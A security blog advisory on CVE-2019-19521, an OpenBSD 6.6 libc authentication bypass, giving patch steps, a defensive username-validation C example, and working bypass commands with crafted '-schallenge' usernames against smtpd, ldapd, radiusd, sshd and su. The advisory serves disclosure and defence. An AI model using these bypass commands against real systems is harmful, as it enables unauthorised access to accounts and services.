CVE-2019-19521 OpenBSD libc authentication bypass

New authentication bypass vulnerability found in OpenBSD

Firo Solutions OpenBSD

Affecting:

Sometimes zero-days in widely used software are the simplest thing.

Summary:

A remote authentication bypass vulnerability has been found in
the latest version of OpenBSD, which is 6.6.
Due to insufficient username validation in libc,
a remote third party can bypass the libc login functions.

Patch it

The OpenBSD developer Reyk Flöte was quick to tweet
about this vulnerability.

If you are running OpenBSD,
it is time to run syspatch:

# syspatch                                                             
Get/Verify syspatch65-011_expat.tgz 100% |*********|   588 KB    00:02    
Installing patch 011_expat
Get/Verify syspatch65-012_sysupgr... 100% |********| 11482       00:00    
Installing patch 012_sysupgrade
Relinking to create unique kernel... done; reboot to load the new kernel
Errata can be reviewed under /var/syspatch

A fix has been written and published as the latest errata patch, 010_libcauth.patch.

Exploiting the authentication bypass

A report of the vulnerability has been published
on the Bugtraq mailing list.
The vulnerability can easily be exploited by providing a
username with the flag “-schallenge”
(or “-schallenge:passwd” to force a passwd-style authentication).
The report describes the vulnerability and the affected parts:

smtpd

If authentication in /etc/mail/smtpd.conf is enabled by just appending “auth” to a rule,
then your system is vulnerable.

The authentication can then be bypassed:

$ printf '\0-schallenge\0whatever' | openssl base64
AC1zY2hhbGxlbmdlAHdoYXRldmVy

$ openssl s_client -connect 192.168.56.121:25 -starttls smtp
...
EHLO client.example.com
...
AUTH PLAIN AC1zY2hhbGxlbmdlAHdoYXRldmVy
235 2.0.0 Authentication succeeded

ldapd

$ ldapsearch -H ldap://192.168.56.121 -O none -U invaliduser -w whatever
SASL/PLAIN authentication started
ldap_sasl_interactive_bind_s: Invalid credentials (49)

$ ldapsearch -H ldap://192.168.56.121 -O none -U -schallenge -w whatever
SASL/PLAIN authentication started
SASL username: -schallenge
...
# numResponses: 1

radiusd

If bsdauth is enabled in /etc/radiusd.conf:

$ radiusctl test 192.168.56.121 secret -schallenge password whatever
    ...
    Reply-Message             = "Authentication succeeded"

sshd

$ ssh -v -F /dev/null -o PreferredAuthentications=keyboard-interactive \
      -o KbdInteractiveDevices=bsdauth -l -sresponse:passwd 192.168.56.121
...
debug1: Next authentication method: keyboard-interactive

su

$ su -L -- -schallenge
Segmentation fault
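The common root cause behind all of the cases above is that the username is handed to the login_* helper program as a command-line argument, so a name beginning with “-” is read as an option (“-schallenge” becomes “-s challenge”). The following is an added example, not code from OpenBSD or from the original post: a username check modelled on that idea, which rejects every username shown in the transcripts above, next to a small simulation (not the real getopt() call) of how the helper would read such an argument. The 32-character limit and the allowed character set are assumed policy.

```c
/* Added example: username validation in the spirit of the libc fix.
 * Not OpenBSD's code; the length limit and character set are assumed. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Return 1 if name is safe to pass to a BSD Auth login script, else 0.
 * Rejects NULL or empty names, names that start with '-' (which a
 * helper would parse as an option) and characters outside
 * [A-Za-z0-9._-]. */
int username_ok(const char *name)
{
    size_t i, n;
    if (name == NULL || (n = strlen(name)) == 0 || n > 32)
        return 0;
    if (name[0] == '-')
        return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-')
            return 0;
    }
    return 1;
}

/* Simulation of how a login helper sees its first argument: a leading
 * "-s" is the service option and the rest is its value; anything else
 * is an ordinary username and NULL is returned. */
const char *service_from_arg(const char *arg)
{
    if (arg[0] == '-' && arg[1] == 's' && arg[2] != '\0')
        return arg + 2;
    return NULL;
}

int main(void)
{
    /* Constructed sample inputs, including the names from the advisory. */
    const char *names[] = { "alice", "-schallenge", "-schallenge:passwd",
                            "-sresponse:passwd" };
    for (size_t i = 0; i < sizeof(names) / sizeof(names[0]); i++) {
        const char *svc = service_from_arg(names[i]);
        printf("%-20s ok=%d service=%s\n", names[i],
               username_ok(names[i]), svc ? svc : "(none)");
    }
    return 0;
}
```

Applying such a check before the name reaches the authentication layer turns every “-s…” username into a plain rejection instead of an option.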

External links:
OpenBSD 6.6 errata
CVE-2019-19521
Bugtraq announcement
libc wikipedia
OpenBSD libc patch


This blog post is part of the exploit of the day series
where we write a shorter description about interesting
exploits that we index.